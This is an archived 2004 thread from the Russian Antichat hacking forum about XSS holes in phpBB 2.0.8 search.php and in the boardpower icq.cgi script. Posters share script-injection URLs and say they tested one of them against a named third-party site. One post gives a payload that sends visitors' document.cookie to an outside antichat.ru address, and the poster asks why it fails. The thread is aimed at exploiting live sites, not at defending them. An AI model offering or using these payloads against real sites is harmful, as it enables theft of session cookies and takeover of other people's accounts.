ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Xss в phpBB 2.0.8
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Xss в phpBB 2.0.8
  #1  
Старый 05.08.2004, 15:28
Аватар для
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию Xss в phpBB 2.0.8
В phpBB 2.0.8 есть уязвимость в search.php и показан пример </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">http://www.example.com/phpBB2/search.php?search_author='<script&gt;alert(documen t.cookie)&lt;/script&gt;[/QUOTE]<span id='postcolor'>
проверал на саитах но не на одново неработает, например:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">http://www.bpmdigitaldjgear.com/phpBB2/search.php?search_author='<script&gt;alert('kkl&#39;&lt;/script&gt;[/QUOTE]<span id='postcolor'>

помогите, что делаю нетак?
 
Ответить с цитированием

  #2  
Старый 06.08.2004, 11:39
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию
Закрыта там эта бага...
Да все равно от нее толку - ноль
 
Ответить с цитированием

  #3  
Старый 06.08.2004, 13:15
Аватар для DDF
DDF
Новичок
Регистрация: 05.08.2004
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию
Вот нашел boardpower баг работаюший если так
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">boardpower/icq.cgi?action=<script&gt;javascript:alert(documen t.cookie);&lt;/script&gt;[/QUOTE]<span id='postcolor'>
показивает как надо, но если так
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">boardpower/icq.cgi?action=%3Cscript%3Ewindow.location='http://antichat.ru/cgi-bin/s.jpg?Info='+document.cookie%3C/script%3E[/QUOTE]<span id='postcolor'>
то неработает.
почему &nbsp;window.location неработает?
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Вопрос про эксплоит на форуме phpbb 2.0.8 dyx Форумы 2 12.04.2005 00:12
Вопрос про заливку шелла в Powered by phpBB 2.0.8 © 2001 phpBB Group onyx3 Форумы 38 15.02.2005 16:25
Что означает сия комбинация на форуме phpBB 2.0.6? dump Форумы 3 24.12.2004 18:06



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ